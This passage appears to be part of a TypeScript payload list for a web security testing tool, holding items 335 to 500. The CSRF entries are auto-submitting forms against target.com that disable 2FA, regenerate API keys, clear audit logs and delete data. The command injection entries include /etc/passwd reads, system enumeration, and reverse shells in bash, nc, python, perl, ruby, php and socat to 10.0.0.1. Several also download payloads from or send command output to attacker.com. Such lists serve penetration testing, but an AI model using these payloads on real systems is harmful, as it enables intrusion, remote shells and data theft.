  { id: 335, category: 'CSRF', value: "<link rel=\"prerender\" href=\"http://target.com/api/action?execute=1\" />" },
  { id: 336, category: 'CSRF', value: "<form action=\"http://target.com/profile\" method=\"POST\" enctype=\"multipart/form-data\"><input name=\"name\" value=\"Audited User\"></form>" },
  { id: 337, category: 'CSRF', value: "<form action=\"http://target.com/api/user\" method=\"POST\"><input type=\"hidden\" name=\"_method\" value=\"DELETE\"></form>" },
  { id: 338, category: 'CSRF', value: "<form action=\"http://target.com/api/user\" method=\"POST\"><input type=\"hidden\" name=\"_method\" value=\"PATCH\"></form>" },
  { id: 339, category: 'CSRF', value: "<iframe src=\"http://target.com/api/ping\" onload=\"this.contentWindow.postMessage('ping', '*')\"></iframe>" },
  { id: 340, category: 'CSRF', value: "<script>var ws = new WebSocket('ws://target.com/socket/channel'); ws.onopen = () => ws.send('subscribe');</script>" },
  { id: 341, category: 'CSRF', value: "<form id=\"f\" action=\"http://target.com/api/invite\" method=\"POST\"><input name=\"email\" value=\"test@target.com\"></form><script>f.submit();</script>" },
  { id: 342, category: 'CSRF', value: "<img src=\"http://target.com/api/v1/logout\" loading=\"lazy\" />" },
  { id: 343, category: 'CSRF', value: "<img srcset=\"http://target.com/api/action 2x\" src=\"x\" />" },
  { id: 344, category: 'CSRF', value: "<picture><source srcset=\"http://target.com/api/action\"><img src=\"x\"></picture>" },
  { id: 345, category: 'CSRF', value: "<script>window.open('http://target.com/api/grant-access?user=audit', '_blank');</script>" },
  { id: 346, category: 'CSRF', value: "<form action=\"http://target.com/api/2fa/disable\" method=\"POST\" id=\"csrf2fa\"></form><script>csrf2fa.submit();</script>" },
  { id: 347, category: 'CSRF', value: "<form action=\"http://target.com/api/api-key/regenerate\" method=\"POST\"></form>" },
  { id: 348, category: 'CSRF', value: "<form action=\"http://target.com/api/webhook/add\" method=\"POST\"><input name=\"url\" value=\"http://audit.local/hook\"></form>" },
  { id: 349, category: 'CSRF', value: "<table background=\"http://target.com/api/action?id=100\"></table>" },
  { id: 350, category: 'CSRF', value: "<body background=\"http://target.com/api/v1/trigger\">" },
  { id: 351, category: 'CSRF', value: "<input type=\"image\" src=\"http://target.com/api/action\">" },
  { id: 352, category: 'CSRF', value: "<form action=\"http://target.com/api/order\" method=\"POST\"><input name=\"qty\" value=\"1\"></form>" },
  { id: 353, category: 'CSRF', value: "<form action=\"http://target.com/api/cart/add\" method=\"POST\"><input name=\"product_id\" value=\"99\"></form>" },
  { id: 354, category: 'CSRF', value: "<form action=\"http://target.com/api/cart/checkout\" method=\"POST\"></form>" },
  { id: 355, category: 'CSRF', value: "<script>fetch('http://target.com/api/data', {method: 'PUT', headers: {'Content-Type': 'application/json'}, body: '{}'})</script>" },
  { id: 356, category: 'CSRF', value: "<form action=\"http://target.com/api/billing/update\" method=\"POST\"><input name=\"plan\" value=\"free\"></form>" },
  { id: 357, category: 'CSRF', value: "<form action=\"http://target.com/api/notifications/preferences\" method=\"POST\"><input name=\"email_alerts\" value=\"0\"></form>" },
  { id: 358, category: 'CSRF', value: "<form action=\"http://target.com/api/team/remove\" method=\"POST\"><input name=\"member_id\" value=\"42\"></form>" },
  { id: 359, category: 'CSRF', value: "<form action=\"http://target.com/api/team/role\" method=\"POST\"><input name=\"role\" value=\"guest\"></form>" },
  { id: 360, category: 'CSRF', value: "<form action=\"http://target.com/api/oauth/revoke\" method=\"POST\"><input name=\"client_id\" value=\"12345\"></form>" },
  { id: 361, category: 'CSRF', value: "<form action=\"http://target.com/api/sessions/revoke-all\" method=\"POST\"></form>" },
  { id: 362, category: 'CSRF', value: "<form action=\"http://target.com/api/account/export\" method=\"POST\"></form>" },
  { id: 363, category: 'CSRF', value: "<script>var r = new XMLHttpRequest(); r.open('POST', 'http://target.com/api/sync', true); r.withCredentials = true; r.send('action=sync');</script>" },
  { id: 364, category: 'CSRF', value: "<form action=\"http://target.com/api/theme\" method=\"GET\"><input name=\"color\" value=\"blue\"></form>" },
  { id: 365, category: 'CSRF', value: "<form action=\"http://target.com/api/language\" method=\"POST\"><input name=\"lang\" value=\"en\"></form>" },
  { id: 366, category: 'CSRF', value: "<form action=\"http://target.com/api/security/questions\" method=\"POST\"><input name=\"q1\" value=\"city\"></form>" },
  { id: 367, category: 'CSRF', value: "<form action=\"http://target.com/api/mfa/sms\" method=\"POST\"><input name=\"phone\" value=\"+123456789\"></form>" },
  { id: 368, category: 'CSRF', value: "<form action=\"http://target.com/api/audit/logs/clear\" method=\"POST\"></form>" },
  { id: 369, category: 'CSRF', value: "<form action=\"http://target.com/api/backup/download\" method=\"GET\"></form>" },
  { id: 370, category: 'CSRF', value: "<form action=\"http://target.com/api/feedback\" method=\"POST\"><input name=\"message\" value=\"Automated Audit\"></form>" },
  { id: 371, category: 'CSRF', value: "<form action=\"http://target.com/api/support/ticket\" method=\"POST\"><input name=\"subject\" value=\"Inquiry\"></form>" },
  { id: 372, category: 'CSRF', value: "<form action=\"http://target.com/api/newsletter/unsubscribe\" method=\"POST\"></form>" },
  { id: 373, category: 'CSRF', value: "<form action=\"http://target.com/api/privacy/gdpr-delete\" method=\"POST\"></form>" },
  { id: 374, category: 'CSRF', value: "<form action=\"http://target.com/api/devices/disconnect\" method=\"POST\"><input name=\"device_id\" value=\"dev_01\"></form>" },
  { id: 375, category: 'CSRF', value: "<form action=\"http://target.com/api/token/refresh\" method=\"POST\"></form>" },
  { id: 376, category: 'CSRF', value: "<form action=\"http://target.com/api/integrations/slack/disable\" method=\"POST\"></form>" },
  { id: 377, category: 'CSRF', value: "<form action=\"http://target.com/api/integrations/github/disconnect\" method=\"POST\"></form>" },
  { id: 378, category: 'CSRF', value: "<form action=\"http://target.com/api/domain/verify\" method=\"POST\"><input name=\"domain\" value=\"target.com\"></form>" },
  { id: 379, category: 'CSRF', value: "<form action=\"http://target.com/api/dns/records\" method=\"POST\"><input name=\"type\" value=\"TXT\"></form>" },
  { id: 380, category: 'CSRF', value: "<form action=\"http://target.com/api/ssl/renew\" method=\"POST\"></form>" },
  { id: 381, category: 'CSRF', value: "<form action=\"http://target.com/api/roles/assign\" method=\"POST\"><input name=\"role\" value=\"auditor\"></form>" },
  { id: 382, category: 'CSRF', value: "<form action=\"http://target.com/api/groups/leave\" method=\"POST\"><input name=\"group_id\" value=\"grp_1\"></form>" },
  { id: 383, category: 'CSRF', value: "<form action=\"http://target.com/api/files/share\" method=\"POST\"><input name=\"file_id\" value=\"f_99\"></form>" },
  { id: 384, category: 'CSRF', value: "<form action=\"http://target.com/api/files/delete\" method=\"POST\"><input name=\"file_id\" value=\"f_100\"></form>" },
  { id: 385, category: 'CSRF', value: "<form action=\"http://target.com/api/folders/create\" method=\"POST\"><input name=\"name\" value=\"AuditFolder\"></form>" },
  { id: 386, category: 'CSRF', value: "<form action=\"http://target.com/api/tags/attach\" method=\"POST\"><input name=\"tag\" value=\"audit\"></form>" },
  { id: 387, category: 'CSRF', value: "<form action=\"http://target.com/api/workspace/rename\" method=\"POST\"><input name=\"name\" value=\"AuditWorkspace\"></form>" },
  { id: 388, category: 'CSRF', value: "<form action=\"http://target.com/api/workspace/archive\" method=\"POST\"></form>" },
  { id: 389, category: 'CSRF', value: "<form action=\"http://target.com/api/permissions/reset\" method=\"POST\"></form>" },
  { id: 390, category: 'CSRF', value: "<form action=\"http://target.com/api/channel/leave\" method=\"POST\"><input name=\"chan\" value=\"general\"></form>" },
  { id: 391, category: 'CSRF', value: "<form action=\"http://target.com/api/status/set\" method=\"POST\"><input name=\"status\" value=\"away\"></form>" },
  { id: 392, category: 'CSRF', value: "<form action=\"http://target.com/api/timezone/update\" method=\"POST\"><input name=\"tz\" value=\"UTC\"></form>" },
  { id: 393, category: 'CSRF', value: "<form action=\"http://target.com/api/currency/set\" method=\"POST\"><input name=\"cur\" value=\"USD\"></form>" },
  { id: 394, category: 'CSRF', value: "<form action=\"http://target.com/api/invoice/send\" method=\"POST\"><input name=\"id\" value=\"inv_101\"></form>" },
  { id: 395, category: 'CSRF', value: "<form action=\"http://target.com/api/tax/update\" method=\"POST\"><input name=\"rate\" value=\"0.0\"></form>" },
  { id: 396, category: 'CSRF', value: "<form action=\"http://target.com/api/coupon/apply\" method=\"POST\"><input name=\"code\" value=\"DISCOUNT\"></form>" },
  { id: 397, category: 'CSRF', value: "<form action=\"http://target.com/api/shipping/address\" method=\"POST\"><input name=\"city\" value=\"Baku\"></form>" },
  { id: 398, category: 'CSRF', value: "<form action=\"http://target.com/api/favorites/clear\" method=\"POST\"></form>" },
  { id: 399, category: 'CSRF', value: "<form action=\"http://target.com/api/history/clear\" method=\"POST\"></form>" },
  { id: 400, category: 'CSRF', value: "<form action=\"http://target.com/api/cache/purge\" method=\"POST\"></form>" },

  // --- Command Injection (System Command Vectors - 100 items) ---
  { id: 401, category: 'Command', value: "; id" },
  { id: 402, category: 'Command', value: "| whoami" },
  { id: 403, category: 'Command', value: "`cat /etc/passwd`" },
  { id: 404, category: 'Command', value: "$(whoami)" },
  { id: 405, category: 'Command', value: "; uname -a" },
  { id: 406, category: 'Command', value: "&& cat /etc/passwd" },
  { id: 407, category: 'Command', value: "|| id" },
  { id: 408, category: 'Command', value: "; ping -c 10 127.0.0.1" },
  { id: 409, category: 'Command', value: "| nc -e /bin/sh 127.0.0.1 4444" },
  { id: 410, category: 'Command', value: "; sleep 5" },
  { id: 411, category: 'Command', value: "`sleep 5`" },
  { id: 412, category: 'Command', value: "$(sleep 5)" },
  { id: 413, category: 'Command', value: "& ping -n 5 127.0.0.1 &" },
  { id: 414, category: 'Command', value: "; netstat -an" },
  { id: 415, category: 'Command', value: "| ps aux" },
  { id: 416, category: 'Command', value: "; env" },
  { id: 417, category: 'Command', value: "&& set" },
  { id: 418, category: 'Command', value: '; find / -name "flag.txt"' },
  { id: 419, category: 'Command', value: "| wget http://attacker.com/shell.sh" },
  { id: 420, category: 'Command', value: "; curl http://attacker.com/log?data=`whoami`" },
  { id: 421, category: 'Command', value: "' ; id ; '" },
  { id: 422, category: 'Command', value: "\" ; id ; \"" },
  { id: 423, category: 'Command', value: "`id`" },
  { id: 424, category: 'Command', value: "; cat /etc/hosts" },
  { id: 425, category: 'Command', value: "| ipconfig" },
  { id: 426, category: 'Command', value: "; systeminfo" },
  { id: 427, category: 'Command', value: "&& dir" },
  { id: 428, category: 'Command', value: "; type C:\\windows\\win.ini" },
  { id: 429, category: 'Command', value: '| powershell -c "Get-Process"' },
  { id: 430, category: 'Command', value: '; python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")\'' },
  { id: 431, category: 'Command', value: "; cat /etc/issue" },
  { id: 432, category: 'Command', value: "; cat /etc/group" },
  { id: 433, category: 'Command', value: "; lsb_release -a" },
  { id: 434, category: 'Command', value: "; hostname" },
  { id: 435, category: 'Command', value: "; uptime" },
  { id: 436, category: 'Command', value: "; df -h" },
  { id: 437, category: 'Command', value: "; free -m" },
  { id: 438, category: 'Command', value: "; w" },
  { id: 439, category: 'Command', value: "; last" },
  { id: 440, category: 'Command', value: "; crontab -l" },
  { id: 441, category: 'Command', value: "; ps -ef" },
  { id: 442, category: 'Command', value: "; netstat -tulpn" },
  { id: 443, category: 'Command', value: "; ss -tulpn" },
  { id: 444, category: 'Command', value: "; route -n" },
  { id: 445, category: 'Command', value: "; arp -a" },
  { id: 446, category: 'Command', value: "; iptables -L" },
  { id: 447, category: 'Command', value: "; ufw status" },
  { id: 448, category: 'Command', value: "; getent passwd" },
  { id: 449, category: 'Command', value: "; getent group" },
  { id: 450, category: 'Command', value: "; history" },
  { id: 451, category: 'Command', value: "; alias" },
  { id: 452, category: 'Command', value: "; export" },
  { id: 453, category: 'Command', value: "; echo $PATH" },
  { id: 454, category: 'Command', value: "; echo $USER" },
  { id: 455, category: 'Command', value: "; echo $HOME" },
  { id: 456, category: 'Command', value: "; which nmap" },
  { id: 457, category: 'Command', value: "; which python" },
  { id: 458, category: 'Command', value: "; which perl" },
  { id: 459, category: 'Command', value: "; which gcc" },
  { id: 460, category: 'Command', value: "; find / -perm -4000 2>/dev/null" },
  { id: 461, category: 'Command', value: "; find / -perm -2000 2>/dev/null" },
  { id: 462, category: 'Command', value: "; find / -writable 2>/dev/null" },
  { id: 463, category: 'Command', value: "; find / -name '*.config' 2>/dev/null" },
  { id: 464, category: 'Command', value: "; find / -name '*.conf' 2>/dev/null" },
  { id: 465, category: 'Command', value: "; find / -name '*.sql' 2>/dev/null" },
  { id: 466, category: 'Command', value: "; tail -n 50 /var/log/auth.log" },
  { id: 467, category: 'Command', value: "; head -n 50 /etc/passwd" },
  { id: 468, category: 'Command', value: "; dmesg" },
  { id: 469, category: 'Command', value: "; lsmod" },
  { id: 470, category: 'Command', value: "; modinfo" },
  { id: 471, category: 'Command', value: "; tasklist" },
  { id: 472, category: 'Command', value: "; sc query" },
  { id: 473, category: 'Command', value: "; net user" },
  { id: 474, category: 'Command', value: "; net localgroup administrators" },
  { id: 475, category: 'Command', value: "; net share" },
  { id: 476, category: 'Command', value: "; arp -g" },
  { id: 477, category: 'Command', value: "; nbtstat -n" },
  { id: 478, category: 'Command', value: "; pathping 127.0.0.1" },
  { id: 479, category: 'Command', value: "; tracert 127.0.0.1" },
  { id: 480, category: 'Command', value: "; driverquery" },
  { id: 481, category: 'Command', value: "; gpresult /r" },
  { id: 482, category: 'Command', value: "; whoami /priv" },
  { id: 483, category: 'Command', value: "; whoami /groups" },
  { id: 484, category: 'Command', value: "; schtasks /query /fo LIST /v" },
  { id: 485, category: 'Command', value: "; reg query HKLM" },
  { id: 486, category: 'Command', value: "; reg query HKCU" },
  { id: 487, category: 'Command', value: "| perl -e 'use Socket;$i=\"10.0.0.1\";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh\");};'" },
  { id: 488, category: 'Command', value: "| ruby -rsocket -e 's=TCPSocket.new(\"10.0.0.1\",443);exec sprintf(\"/bin/sh -i <&%d >&%d 2>&1\",s.fileno,s.fileno)'" },
  { id: 489, category: 'Command', value: "| php -r '$sock=fsockopen(\"10.0.0.1\",443);exec(\"/bin/sh <&3 >&3 2>&3\");'" },
  { id: 490, category: 'Command', value: "; nc 10.0.0.1 443 -e /bin/bash" },
  { id: 491, category: 'Command', value: "; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 443 >/tmp/f" },
  { id: 492, category: 'Command', value: "; bash -i >& /dev/tcp/10.0.0.1/443 0>&1" },
  { id: 493, category: 'Command', value: "; socat tcp-connect:10.0.0.1:443 exec:/bin/sh,pty,stderr,setsid,sigint,sane" },
  { id: 494, category: 'Command', value: "; openssl s_client -connect 10.0.0.1:443" },
  { id: 495, category: 'Command', value: "; curl -O http://attacker.com/payload.sh" },
  { id: 496, category: 'Command', value: "; chmod +x payload.sh && ./payload.sh" },
  { id: 497, category: 'Command', value: "; bash payload.sh" },
  { id: 498, category: 'Command', value: "; sh payload.sh" },
  { id: 499, category: 'Command', value: "; zsh payload.sh" },
  { id: 500, category: 'Command', value: "; source payload.sh" }
];

export const csrfPayloadsData: PayloadItem[] = payloadsData.filter(p => p.category === 'CSRF');
export const commandPayloadsData: PayloadItem[] = payloadsData.filter(p => p.category === 'Command');


